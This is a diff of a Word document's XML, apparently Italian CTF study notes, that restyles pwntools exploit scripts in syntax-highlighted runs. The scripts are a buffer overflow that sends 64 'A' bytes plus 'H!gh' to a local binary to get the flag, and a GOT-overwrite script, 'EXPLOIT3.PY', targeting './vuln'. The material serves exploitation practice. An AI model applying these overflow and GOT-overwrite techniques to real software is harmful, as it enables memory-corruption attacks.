+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sendline</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="6a9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="6a9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># Ricevi e stampa l'output (compresa la flag)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
         <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">from pwn import *</w:t>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="dcdcaa"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="dcdcaa"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">recvall</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">().</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="dcdcaa"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">decode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">())</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
       </w:r>
     </w:p>
     <w:p>
@@ -1132,7 +2067,6 @@
         <w:rPr>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve"># Carica il binario (sostituisci con il path corretto)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1143,157 +2077,6 @@
         <w:rPr>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">exe = "./pwn0"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">elf = context.binary = ELF(exe, checksec=False)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Avvia il processo locale</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">p = process(exe)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Costruzione del payload:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># 64 byte per riempire buffer + "H!gh" per sovrascrivere josh</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">payload = b"A"*64 + b"H!gh"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Invia l'input al programma</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">p.sendline(payload)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Ricevi e stampa l'output (compresa la flag)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">print(p.recvall().decode())</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8110,14 +8893,749 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="c586c0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="1155cc"/>
           <w:u w:val="single"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">EXPLOIT3.PY</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="c586c0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">from</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="4ec9b0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">pwn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="c586c0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">*</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="ce9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">exitGOT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="ce9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">'404048'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="ce9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">targetAddr</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="ce9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">'401276'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="4ec9b0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">process</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="ce9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">'./vuln'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="dcdcaa"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sendlineafter</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="ce9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d7ba7d"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">\n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="ce9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="ce9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">'y'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="6a9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="dcdcaa"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sendline</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="4ec9b0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">str</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="569cd6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">0x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="b5cea8"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">401276</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="6a9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">#target</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
